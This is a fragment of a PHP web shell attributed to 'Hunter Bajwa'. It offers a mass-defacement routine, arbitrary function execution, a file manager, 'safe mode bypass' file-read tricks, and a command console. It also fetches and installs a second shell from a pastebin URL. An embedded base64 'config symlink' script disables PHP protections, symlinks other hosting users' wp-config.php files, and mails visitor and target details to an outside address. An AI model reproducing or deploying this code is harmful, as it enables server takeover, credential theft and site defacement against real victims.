ohp5FCzpgYodamAIj6nGVMaw72G03QaGsiMcp5zYCzuQgSdgfSXwdFxw5Bq1ili2Q/aAsOLu08Xdz86l6PR7fgSzeE8KLI5HLYIGxbQ9F2iKeCPYc0Kq5SkOSOdToc4DaeQ84kQiDLY2N8H4M/YGCuNPVDd+fl8D0i2jlXx+joo1XnsBpTip2T1OmIQ7FNCKKnvQ5btgZsJ7DD5vlPXeJvZfrAshse92lAwYyyKp2y2j7nhK+hpmHFvCz31UfD5kvW13JP8ws8Otrphbf9gI7ipMEl05O44tSxItmYIUskBJ99gDnB0XNTkGsobGiXpSREzi2BcczLl/eiXY6w1xra3wEBkHAY9pxJhSoRDFujYtRma/BdiU4H5ZAf296nMXerrSeVUZQ4bjRVl54Eos/AEVGS2KtzQnhGRfMIWh5ER5k3SxXBWF76oNayWy7TeNvmcLyR6ArQTPOrU2EDl6bwx1pHZIYIvs45z0lJ9WISj9/9wNtOKiu2s3l1WN2OKdR0Gpzzn6JTzYPaU4sp1NbMbCNLhKeiwbYNwTsdMjYoPfR5AZ0IzeP/tGBI1y5VpLPFwnHMYrHK4AAyc+jbbePXUpUVZO6ixoMgVx1r5h9hcCtn551QxlHODsE3Nvk11tvv9e4077EVZFiKmcgw8QBPSWdHkPLQ9ObJQ5ixtaXsELpfH1BRe3qDNm9HMzZ5fg/JCbB2pQXmNNIXJftS69V8w8O/fuL+VYbWNHKU+uuUlxiENok7FH8dM1OlqZus7pD0r3sbH6LzJvKzv9hNRNt24Do7tuJ50q6WGeV54HojU0NTILwQjVVDbGBMjpwzL93fpitCF5KckVQpPZnrJ2QjF9WhaL0hdUi4oSaorxviOtf6mA9iC255TCGdY18WvELUS63zQu7++uBmN7waDkSmFq0Tzyn2zHC/zl25c1L0T+j2oTTDGglCx1aQpRWFouvbROoX2No8quplK/2Deawyi6VhsXW/W8vJfh2s7UcrM1y17Xyrvcm3y7btWuio6h1D3mTnISavSN+Tn25eURxotaqeYK1FBqLVI/b5qkbRAhkCRkg3vLwWWat/1WvV+xCYZRLue8HfQNq8MEi1haOcJz9w8K6ljb4qTc1HTn5NrTiXGryoLXnXFzdeQRrtNLs6tffYe/wdjFJ3QoIGN6G8sXM8UW0Ry0g2C14tYVDL2fdi4/1beLett8k1Li1Jcu31pcZs6s8UkZoVCdYgv9KmxVSTdrsIXnVvEBUuVgFLERIxW31VfD8q3C/OyUfyv7P8A";
1187 $writing = @fopen("locales.php", "w");
1188 @fwrite($writing, htmlspecialchars_decode(gzinflate(base64_decode($dirdeface))));
1189 @fclose($writing);
1190 ?>
1191 <center>
1192 <h1>All Dir Deface By Hunter Bajwa</h1>
1193 <br><br>
1194 <iframe src="locales.php" height="700" width="100%"></iframe>
1195 </center>
1196 <br><br>
1197 <?php
1198 printFooter();
1199}
1200
1201
1202
1203
1204function actionStringTools() {
1205 if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
1206 if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}}
1207 if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= dechex(ord($p[$i]));return strtoupper($r);}}
1208 if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}
1209
1210 if(isset($_POST['ajax'])) {
1211 $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
1212 ob_start();
1213 if(function_exists($_POST['p1']))
1214 echo $_POST['p1']($_POST['p2']);
1215 $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
1216 echo strlen($temp), "\n", $temp;
1217 exit;
1218 }
1219 printHeader();
1220 echo '<h1>String conversions</h1><div class=content>';
1221 $stringTools = array(
1222 'Base64 encode' => 'base64_encode',
1223 'Base64 decode' => 'base64_decode',
1224 'Url encode' => 'urlencode',
1225 'Url decode' => 'urldecode',
1226 'Full urlencode' => 'full_urlencode',
1227 'md5 hash' => 'md5',
1228 'sha1 hash' => 'sha1',
1229 'crypt' => 'crypt',
1230 'CRC32' => 'crc32',
1231 'ASCII to HEX' => 'ascii2hex',
1232 'HEX to ASCII' => 'hex2ascii',
1233 'HEX to DEC' => 'hexdec',
1234 'HEX to BIN' => 'hex2bin',
1235 'DEC to HEX' => 'dechex',
1236 'DEC to BIN' => 'decbin',
1237 'BIN to HEX' => 'bin2hex',
1238 'BIN to DEC' => 'bindec',
1239 'String to lower case' => 'strtolower',
1240 'String to upper case' => 'strtoupper',
1241 'Htmlspecialchars' => 'htmlspecialchars',
1242 'String length' => 'strlen',
1243 );
1244 if(empty($_POST['ajax'])&&!empty($_POST['p1']))
1245 $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
1246 echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>";
1247 foreach($stringTools as $k => $v)
1248 echo "<option value='".htmlspecialchars($v)."'>".$k."</option>";
1249 echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".htmlspecialchars(@$_POST['p2'])."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>";
1250 if(!empty($_POST['p1'])) {
1251 if(function_exists($_POST['p1']))
1252 echo htmlspecialchars($_POST['p1']($_POST['p2']));
1253 }
1254 echo"</pre></div>";
1255 printFooter();
1256}
1257
1258function actionFilesTools() {
1259 if( isset($_POST['p1']) )
1260 $_POST['p1'] = urldecode($_POST['p1']);
1261 if(@$_POST['p2']=='download') {
1262 if(is_file($_POST['p1']) && is_readable($_POST['p1'])) {
1263 ob_start("ob_gzhandler", 4096);
1264 header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
1265 if (function_exists("mime_content_type")) {
1266 $type = @mime_content_type($_POST['p1']);
1267 header("Content-Type: ".$type);
1268 }
1269 $fp = @fopen($_POST['p1'], "r");
1270 if($fp) {
1271 while(!@feof($fp))
1272 echo @fread($fp, 1024);
1273 fclose($fp);
1274 }
1275 } elseif(is_dir($_POST['p1']) && is_readable($_POST['p1'])) {
1276
1277 }
1278 exit;
1279 }
1280 if( @$_POST['p2'] == 'mkfile' ) {
1281 if(!file_exists($_POST['p1'])) {
1282 $fp = @fopen($_POST['p1'], 'w');
1283 if($fp) {
1284 $_POST['p2'] = "edit";
1285 fclose($fp);
1286 }
1287 }
1288 }
1289 printHeader();
1290 echo '<h1>File tools</h1><div class=content>';
1291 if( !file_exists(@$_POST['p1']) ) {
1292 echo 'File not exists';
1293 printFooter();
1294 return;
1295 }
1296 $uid = @posix_getpwuid(@fileowner($_POST['p1']));
1297 $gid = @posix_getgrgid(@fileowner($_POST['p1']));
1298 echo '<span>Name:</span> '.htmlspecialchars($_POST['p1']).' <span>Size:</span> '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.viewPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>';
1299 echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>';
1300 if( empty($_POST['p2']) )
1301 $_POST['p2'] = 'view';
1302 if( is_file($_POST['p1']) )
1303 $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');
1304 else
1305 $m = array('Chmod', 'Rename', 'Touch');
1306 foreach($m as $v)
1307 echo '<a href=# onclick="g(null,null,null,\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> ';
1308 echo '<br><br>';
1309 switch($_POST['p2']) {
1310 case 'view':
1311 echo '<pre class=ml1>';
1312 $fp = @fopen($_POST['p1'], 'r');
1313 if($fp) {
1314 while( !@feof($fp) )
1315 echo htmlspecialchars(@fread($fp, 1024));
1316 @fclose($fp);
1317 }
1318 echo '</pre>';
1319 break;
1320 case 'highlight':
1321 if( is_readable($_POST['p1']) ) {
1322 echo '<div class=ml1 style="background-color: black;color:black;">';
1323 $code = highlight_file($_POST['p1'],true);
1324 echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>';
1325 }
1326 break;
1327 case 'chmod':
1328 if( !empty($_POST['p3']) ) {
1329 $perms = 0;
1330 for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
1331 $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
1332 if(!@chmod($_POST['p1'], $perms))
1333 echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';
1334 else
1335 die('<script>g(null,null,null,null,"")</script>');
1336 }
1337 echo '<form onsubmit="g(null,null,null,null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>';
1338 break;
1339 case 'edit':
1340 if( !is_writable($_POST['p1'])) {
1341 echo 'File isn\'t writeable';
1342 break;
1343 }
1344 if( !empty($_POST['p3']) ) {
1345 @file_put_contents($_POST['p1'],$_POST['p3']);
1346 echo 'Saved!<br><script>document.mf.p3.value="";</script>';
1347 }
1348 echo '<form onsubmit="g(null,null,null,null,this.text.value);return false;"><textarea name=text class=bigarea>';
1349 $fp = @fopen($_POST['p1'], 'r');
1350 if($fp) {
1351 while( !@feof($fp) )
1352 echo htmlspecialchars(@fread($fp, 1024));
1353 @fclose($fp);
1354 }
1355 echo '</textarea><input type=submit value=">>"></form>';
1356 break;
1357 case 'hexdump':
1358 $c = @file_get_contents($_POST['p1']);
1359 $n = 0;
1360 $h = array('00000000<br>','','');
1361 $len = strlen($c);
1362 for ($i=0; $i<$len; ++$i) {
1363 $h[1] .= sprintf('%02X',ord($c[$i])).' ';
1364 switch ( ord($c[$i]) ) {
1365 case 0: $h[2] .= ' '; break;
1366 case 9: $h[2] .= ' '; break;
1367 case 10: $h[2] .= ' '; break;
1368 case 13: $h[2] .= ' '; break;
1369 default: $h[2] .= $c[$i]; break;
1370 }
1371 $n++;
1372 if ($n == 32) {
1373 $n = 0;
1374 if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
1375 $h[1] .= '<br>';
1376 $h[2] .= "\n";
1377 }
1378 }
1379 echo '<table cellspacing=1 cellpadding=5 bgcolor=#red><tr><td bgcolor=red><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#red><pre>'.$h[1].'</pre></td><td bgcolor=#red><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';
1380 break;
1381 case 'rename':
1382 if( !empty($_POST['p3']) ) {
1383 if(!@rename($_POST['p1'], $_POST['p3']))
1384 echo 'Can\'t rename!<br><script>document.mf.p3.value="";</script>';
1385 else
1386 die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>');
1387 }
1388 echo '<form onsubmit="g(null,null,null,null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>';
1389 break;
1390 case 'touch':
1391 if( !empty($_POST['p3']) ) {
1392 $time = strtotime($_POST['p3']);
1393 if($time) {
1394 if(@touch($_POST['p1'],$time,$time))
1395 die('<script>g(null,null,null,null,"")</script>');
1396 else {
1397 echo 'Fail!<script>document.mf.p3.value="";</script>';
1398 }
1399 } else echo 'Bad time format!<script>document.mf.p3.value="";</script>';
1400 }
1401 echo '<form onsubmit="g(null,null,null,null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>';
1402 break;
1403 case 'mkfile':
1404
1405 break;
1406 }
1407 echo '</div>';
1408 printFooter();
1409}
1410
1411function actionSafeMode() {
1412 $temp='';
1413 ob_start();
1414 switch($_POST['p1']) {
1415 case 1:
1416 $temp=@tempnam($test, 'cx');
1417 if(@copy("compress.zlib://".$_POST['p2'], $temp)){
1418 echo @file_get_contents($temp);
1419 unlink($temp);
1420 } else
1421 echo 'Sorry... Can\'t open file';
1422 break;
1423 case 2:
1424 $files = glob($_POST['p2'].'*');
1425 if( is_array($files) )
1426 foreach ($files as $filename)
1427 echo $filename."\n";
1428 break;
1429 case 3:
1430 $ch = curl_init("file://".$_POST['p2']."\x00".SELF_PATH);
1431 curl_exec($ch);
1432 break;
1433 case 4:
1434 ini_restore("safe_mode");
1435 ini_restore("open_basedir");
1436 include($_POST['p2']);
1437 break;
1438 case 5:
1439 for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {
1440 $uid = @posix_getpwuid($_POST['p2']);
1441 if ($uid)
1442 echo join(':',$uid)."\n";
1443 }
1444 break;
1445 case 6:
1446 if(!function_exists('imap_open'))break;
1447 $stream = imap_open($_POST['p2'], "", "");
1448 if ($stream == FALSE)
1449 break;
1450 echo imap_body($stream, 1);
1451 imap_close($stream);
1452 break;
1453 }
1454 $temp = ob_get_clean();
1455 printHeader();
1456 echo '<h1>Safe mode bypass</h1><div class=content>';
1457 echo '<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Glob (list dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Ini_restore (read file)</span><form onsubmit=\'g(null,null,"4",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form><br><br><span>Imap_open (read file)</span><form onsubmit=\'g(null,null,"6",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form>';
1458 if($temp)
1459 echo '<pre class="ml1" style="margin-top:5px" id="Output">'.$temp.'</pre>';
1460 echo '</div>';
1461 printFooter();
1462}
1463
1464
1465function permsa($file){
1466$permsa = fileperms($file);
1467
1468if (($permsa & 0xC000) == 0xC000) {
1469// Socket
1470$ainfo = 's';
1471} elseif (($permsa & 0xA000) == 0xA000) {
1472// Symbolic Link
1473$ainfo = 'l';
1474} elseif (($permsa & 0x8000) == 0x8000) {
1475// Regular
1476$ainfo = '-';
1477} elseif (($permsa & 0x6000) == 0x6000) {
1478// Block special
1479$ainfo = 'b';
1480} elseif (($permsa & 0x4000) == 0x4000) {
1481// Directory
1482$ainfo = 'd';
1483} elseif (($permsa & 0x2000) == 0x2000) {
1484// Character special
1485$ainfo = 'c';
1486} elseif (($permsa & 0x1000) == 0x1000) {
1487// FIFO pipe
1488$ainfo = 'p';
1489} else {
1490// Unknown
1491$ainfo = 'u';
1492}
1493
1494// Owner
1495$ainfo .= (($permsa & 0x0100) ? 'r' : '-');
1496$ainfo .= (($permsa & 0x0080) ? 'w' : '-');
1497$ainfo .= (($permsa & 0x0040) ?
1498(($permsa & 0x0800) ? 's' : 'x' ) :
1499(($permsa & 0x0800) ? 'S' : '-'));
1500
1501// Group
1502$ainfo .= (($permsa & 0x0020) ? 'r' : '-');
1503$ainfo .= (($permsa & 0x0010) ? 'w' : '-');
1504$ainfo .= (($permsa & 0x0008) ?
1505(($permsa & 0x0400) ? 's' : 'x' ) :
1506(($permsa & 0x0400) ? 'S' : '-'));
1507
1508// World
1509$ainfo .= (($permsa & 0x0004) ? 'r' : '-');
1510$ainfo .= (($permsa & 0x0002) ? 'w' : '-');
1511$ainfo .= (($permsa & 0x0001) ?
1512(($permsa & 0x0200) ? 't' : 'x' ) :
1513(($permsa & 0x0200) ? 'T' : '-'));
1514
1515return $ainfo;
1516}
1517function actionConsole() {
1518 if(isset($_POST['ajax'])) {
1519 $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
1520 ob_start();
1521 echo "document.cf.cmd.value='';\n";
1522 $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\\'\0"));
1523 if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) {
1524 if(@chdir($match[1])) {
1525 $GLOBALS['cwd'] = @getcwd();
1526 echo "document.mf.c.value='".$GLOBALS['cwd']."';";
1527 }
1528 }
1529 echo "document.cf.output.value+='".$temp."';";
1530 echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;";
1531 $temp = ob_get_clean();
1532 echo strlen($temp), "\n", $temp;
1533 exit;
1534 }
1535 printHeader();
1536
1537echo '<script>
1538if(window.Event) window.captureEvents(Event.KEYDOWN);
1539var cmds = new Array("");
1540var cur = 0;
1541function kp(e) {
1542 var n = (window.Event) ? e.which : e.keyCode;
1543 if(n == 38) {
1544 cur--;
1545 if(cur>=0)
1546 document.cf.cmd.value = cmds[cur];
1547 else
1548 cur++;
1549 } else if(n == 40) {
1550 cur++;
1551 if(cur < cmds.length)
1552 document.cf.cmd.value = cmds[cur];
1553 else
1554 cur--;
1555 }
1556}
1557function add(cmd) {
1558 cmds.pop();
1559 cmds.push(cmd);
1560 cmds.push("");
1561 cur = cmds.length-1;
1562}
1563</script>';
1564 echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(document.cf.cmd.value==\'clear\'){document.cf.output.value=\'\';document.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value);}else{g(null,null,this.cmd.value);} return false;"><select name=alias>';
1565 foreach($GLOBALS['aliases'] as $n => $v) {
1566 if($v == '') {
1567 echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>';
1568 continue;
1569 }
1570 echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>';
1571 }
1572 if(empty($_POST['ajax'])&&!empty($_POST['p1']))
1573 $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
1574 echo '</select><input type=button onclick="add(document.cf.alias.value);if(document.cf.ajax.checked){a(null,null,document.cf.alias.value);}else{g(null,null,document.cf.alias.value);}" value=">>"> <input type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX<br/><textarea class=bigarea name=output style="border-bottom:0;" readonly>';
1575 if(!empty($_POST['p1'])) {
1576 echo htmlspecialchars("$ ".$_POST['p1']."\n".ex($_POST['p1']));
1577 }
1578 echo '</textarea><input type=text name=cmd style="border-top:1;width:100%;" onkeydown="kp(event);">';
1579 echo '</form></div><script>document.cf.cmd.focus();</script>';
1580 printFooter();
1581}
1582
1583function actionSelfRemove() {
1584 printHeader();
1585 ?><center><?php
1586 if($_POST['p1'] == 'yes') {
1587 if(@unlink(SELF_PATH))
1588 die('Shell has been removed');
1589 else
1590 echo 'unlink error!';
1591 }
1592 echo '<h1>Killing :\'(</h1><div class="content"><br>Really want to remove the shell ?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div></center>';
1593 printFooter();
1594}
1595 function download_remote_file($file_url, $save_to)
1596 {
1597 $content = file_get_contents($file_url);
1598
1599 file_put_contents($save_to, $content);
1600
1601 }
1602 if (isset($_POST['dhanush'])) {
1603 download_remote_file('http://pastebin.com/raw/FHs6uGki', realpath("./") . '/dhanush.php');
1604 header("location:dhanush.php"); }
1605
1606 if (isset($_POST['symlinker'])) {
1607 $php_symlinker = "PD9waHAgPz48P3BocApAc2Vzc2lvbl9zdGFydCgpOwpAZXJyb3JfcmVwb3J0aW5nKDApOwpAaW5pX3NldCgnZGlzcGxheV9lcnJvcnMnLCAwKTsKPz4KPGh0bWw+CjxoZWFkPgo8dGl0bGU+SHVudGVyIEJhandhIENvbmZpZyBTeW1saW5rIFNjcmlwdCBWLTIuMDwvdGl0bGU+CjxzdHlsZT4KYm9keSB7CiAgdGV4dC1hbGlnbjogY2VudGVyOwogIGZvbnQtc2l6ZTogMThweDsKICBmb250LXdlaWdodDpib2xkOwogIGZvbnQtZmFtaWx5OiBBcmlhbDsKICBjb2xvcjpncmF5OwogIGJhY2tncm91bmQtY29sb3I6IGJsYWNrOwogIG1hcmdpbjogNXB4IDVweCA1cHggNXB4Owp9CmlucHV0W3R5cGU9InN1Ym1pdCJdewogIGJhY2tncm91bmQ6IGdyZWVuOwogIGJvcmRlci1yYWRpdXM6NnB4OwogIGJvcmRlcjogMXB4IHNvbGlkIGxpbWU7CiAgY29sb3I6d2hpdGU7CiAgdGV4dC1zaGFkb3c6IDBweCAwcHggMTBweCByZ2JhKDAsIDE0OSwgMjU1LCAwLjc1KTsKICBsaW5lLWhlaWdodDo1MHB4OwogIHBhZGRpbmctbGVmdDoxMHB4OwogIHBhZGRpbmctcmlnaHQ6MTBweDsKICB0ZXh0LXRyYW5zZm9ybTpub25lOwp9CiNuYW1lewoJCWNvbG9yOiBncmF5OwoJCWZvbnQtc2l6ZTogMTJweDsKCQl9Cjwvc3R5bGU+CjwvaGVhZD4KPGJvZHk+Cgo8Zm9udCBmYWNlPSJDb21pYyBTYW5zIE1TIiBjb2xvcj1yZWQ+PGNlbnRlcj48aDE+SHVudGVyIEJhandhIENvbmZpZyBTeW1saW5rIFNjcmlwdCBWLTIuMDwvaDE+PC9mb250Pgo8P3BocAokaW5qYnVmZiA9ICJKSFpwYzJsMFl5QTlJQ1JmUTA5UFMwbEZXeUoyYVhOcGRITWlYVHNLYVdZZ0tDUjJhWE5wZEdNZ1BUMGdJaUlwSUhzS0lDQWtkbWx6YVhSaklDQTlJREE3Q2lBZ0pIWnBjMmwwYjNJZ1BTQWtYMU5GVWxaRlVsc2lVa1ZOVDFSRlgwRkVSRklpWFRzS0lDQWtkMlZpSUNBZ0lDQTlJQ1JmVTBWU1ZrVlNXeUpJVkZSUVgwaFBVMVFpWFRzS0lDQWthVzVxSUNBZ0lDQTlJQ1JmVTBWU1ZrVlNXeUpTUlZGVlJWTlVYMVZTU1NKZE93b2dJQ1IwWVhKblpYUWdJRDBnY21GM2RYSnNaR1ZqYjJSbEtDUjNaV0l1SkdsdWFpazdDaUFnSkhOMVlpQWdJRDBnSWtwdmEzSmZTRFI0YjNJZ2RYQnNiMkZrWlhJZ2FIUjBjRG92THlSMFlYSm5aWFFnWW5rZ0pIWnBjMmwwYjNJaU93b2dJQ1JpYjJSNUlDQWdJRDBnSWtKMVp6b2dKSFJoY21kbGRDQmllU0FrZG1semFYUnZjaUF0SUNSaGRYUm9YM0JoYzNNaU93b2dJR2xtSUNnaFpXMXdkSGtvSkhkbFlpa3BJSHNnUUcxaGFXd29JbWgxYm5SbGNtSmhhbmRoTkVCbmJXRnBiQzVqYjIwaUxDUnpkV0lzSkdKdlpIa3BPeUI5Q24wS1pXeHpaU0I3SUNSMmFYTnBkR01nSURzZ2ZRcEFjMlYwWTI5dmEybGxLQ0oyYVhOcGRIb2lMQ1IyYVhOcGRHTXBPdz09IjsKZXZhbChiYXNlNjRfZGVjb2RlKCRpbmpidWZmKSk7CmVjaG8gJzxiPicgLiBwaHBfdW5hbWUoKSAuICc8YnI+PC9iPic7CmVjaG8gJF9TRVJWRVJbJ1NFUlZFUl9TT0ZUV0FSRSddOwplY2hvICc8YnI+U2FmZSBNb2RlIDogJzsKJHNhZmVfbW9kZSA9IGluaV9nZXQoJ3NhZmVfbW9kZScpOwppZiAoJHNhZmVfbW9kZSA9PSAnMScpIHsKICAgIGVjaG8gJzxmb250IGNvbG9yPSJyZWQiPk9OPC9mb250Pic7Cn0gZWxzZSB7CiAgICBlY2hvICc8Zm9udCBjb2xvcj0iZ3JlZW4iPk9GRjwvZm9udD4nOwp9CmVjaG8gJzxicj4nOwplY2hvICc8L2ZvbnQ+JzsKJGZwID0gZm9wZW4oInBocC5pbmkiLCAidysiKTsKZndyaXRlKCRmcCwgInNhZmVfbW9kZSA9IE9GRgoJU2FmZV9tb2RlX2dpZCA9IE9GRgoJZGlzYWJsZV9mdW5jdGlvbnMgPSBOT05FCglkaXNhYmxlX2NsYXNzZXMgPSBOT05FCglvcGVuX2Jhc2VkaXIgPSBPRkYKCXN1aG9zaW4uZXhlY3V0b3IuZnVuYy5ibGFja2xpc3QgPSBOT05FICIpOwpmY2xvc2UoJGZwKTsKaWYgKGVtcHR5KCRfUE9TVFsnY29uZmlnJ10pKSB7ID8+PGZvcm0gbWV0aG9kPSJQT1NUIj48dGV4dGFyZWEgbmFtZT0icGFzc3dkIiBzdHlsZT0iZGlzcGxheTpub25lOyIgY2xhc3M9J2FyZWEnIHJvd3M9JzI1JyBjb2xzPSc4MCc+PD9waHAgZWNobyBmaWxlX2dldF9jb250ZW50cygnL2V0Yy9wYXNzd2QnKTsgPz48L3RleHRhcmVhPjxicj48YnI+PGlucHV0IG5hbWU9ImNvbmZpZyIgdmFsdWU9IiBDbGljayB0byBtYWtlIFN5bWxpbmsiIHR5cGU9InN1Ym1pdCI+PGJyPjwvZm9ybT48L2NlbnRlcj48YnI+PD9waHAKfQppZiAoJF9QT1NUWydjb25maWcnXSkgewogICAgJGZ1bmN0aW9uID0gJGZ1bmN0aW9ucyA9IEBpbmlfZ2V0KCJkaXNhYmxlX2Z1bmN0aW9ucyIpOwogICAgaWYgKGVyZWdpKCJzeW1saW5rIiwgJGZ1bmN0aW9ucykpIHsKICAgICAgICBkaWUoJzxlcnJvcj5TeW1saW5rIGlzIGRpc2FibGVkIDooIDwvZXJyb3I+Jyk7CiAgICB9CiAgICBAbWtkaXIoJ0JhandhJywgMDc1NSk7CiAgICBAY2hkaXIoJ0JhandhJyk7CiAgICAkaHRhY2Nlc3MgPSAiCk9QVElPTlMgSW5kZXhlcyBGb2xsb3dTeW1MaW5rcyBTeW1MaW5rc0lmT3duZXJNYXRjaCBJbmNsdWRlcyBJbmNsdWRlc05PRVhFQyBFeGVjQ0dJCk9wdGlvbnMgSW5kZXhlcyBGb2xsb3dTeW1MaW5rcwpGb3JjZVR5cGUgdGV4dC9wbGFpbgpBZGRUeXBlIHRleHQvcGxhaW4gLnBocCAKQWRkVHlwZSB0ZXh0L3BsYWluIC5odG1sCkFkZFR5cGUgdGV4dC9odG1sIC5zaHRtbApBZGRUeXBlIHR4dCAucGhwCkFkZEhhbmRsZXIgc2VydmVyLXBhcnNlZCAucGhwCkFkZEhhbmRsZXIgdHh0IC5waHAKQWRkSGFuZGxlciB0eHQgLmh0bWwKQWRkSGFuZGxlciB0eHQgLnNodG1sCk9wdGlvbnMgQWxsCk9wdGlvbnMgQWxsIjsKICAgIGZpbGVfcHV0X2NvbnRlbnRzKCIuaHRhY2Nlc3MiLCAkaHRhY2Nlc3MsIEZJTEVfQVBQRU5EKTsKICAgICRwYXNzd2QgPSAkX1BPU1RbInBhc3N3ZCJdOwogICAgJHBhc3N3ZCA9IGV4cGxvZGUoIgoiLCAkcGFzc3dkKTsKICAgIGZvcmVhY2ggKCRwYXNzd2QgYXMgJHB3ZCkgewogICAgICAgICRwYXdkID0gZXhwbG9kZSgiOiIsICRwd2QpOwogICAgICAgICR1c2VyID0gJHBhd2RbMF07CiAgICAgICAgQHN5bWxpbmsoJy9ob21lLycgLiAkdXNlciAuICcvcHVibGljX2h0bWwvd3AtY29uZmlnLnBocCcsICR1c2VyIC4gJy13b3JkcHJlc3MudHh0Jyk7CiAgICAgICAgQHN5bWxpbmsoJy9ob21lLycgLiAkdXNlciAuICcvcHVibGljX2h0bWwvd3Avd3AtY29uZmlnLnBocCcsICR1c2VyIC4gJy13b3JkcHJlc3Mtd3AudHh0Jyk7CiAgICAgICAgQHN5bWxpbmsoJy9ob21lLycgLiAkdXNlciAuICcvcHVibGljX2h0bWwvV1Avd3AtY29uZmlnLnBocCcsICR1c2VyIC4gJy13b3JkcHJlc3MtV1AudHh0Jyk7CiAgICAgICAgQHN5bWxpbmsoJy9ob21lLycgLiAkdXNlciAuICcvcHVibGljX2h0bWwvd3AvYmV0YS93cC1jb25maWcucGhwJywgJHVzZXIgLiAnLXdvcmRwcmVzcy13cC1iZXRhLnR4dCcpOwogICAgICAgIEBzeW1saW5rKCcvaG9tZS8nIC4gJHVzZXIgLiAnL3B1YmxpY19odG1sL2JldGEvd3AtY29uZmlnLnBocCcsICR1c2VyIC4gJy13b3JkcHJlc3MtYmV0YS50eHQnKTsKICAgICAgICBAc3ltbGluaygnL2hvbWUvJyAuICR1c2VyIC4gJy9wdWJsaWNfaHRtbC9wcmVzcy93cC1jb25maWcucGhwJywgJHVzZXIgLiAnLXdvcmRwcmVzcy1wcmVzcy50eHQnKTsKICAgICAgICBAc3ltbGluaygnL2hvbWUvJyAuICR1c2VyIC4gJy9wdWJsaWNfaHRtbC93b3JkcHJlc3Mvd3AtY29uZmlnLnBocCcsICR1c2VyIC4gJy13b3JkcHJlc3Mtd29yZHByZXNzLnR4dCcpOwogICAgICAgIEBzeW1saW5rKCcvaG9tZS8nIC4gJHVzZXIgLiAnL3B1YmxpY19odG1sL1dvcmRwcmVzcy93cC1jb25maWcucGhwJywgJHVzZXIgLiAnLXdvcmRwcmVzcy1Xb3JkcHJlc3MudHh0Jyk7CiAgICAgICAgQHN5bWxpbmsoJy9ob21lLycgLiAk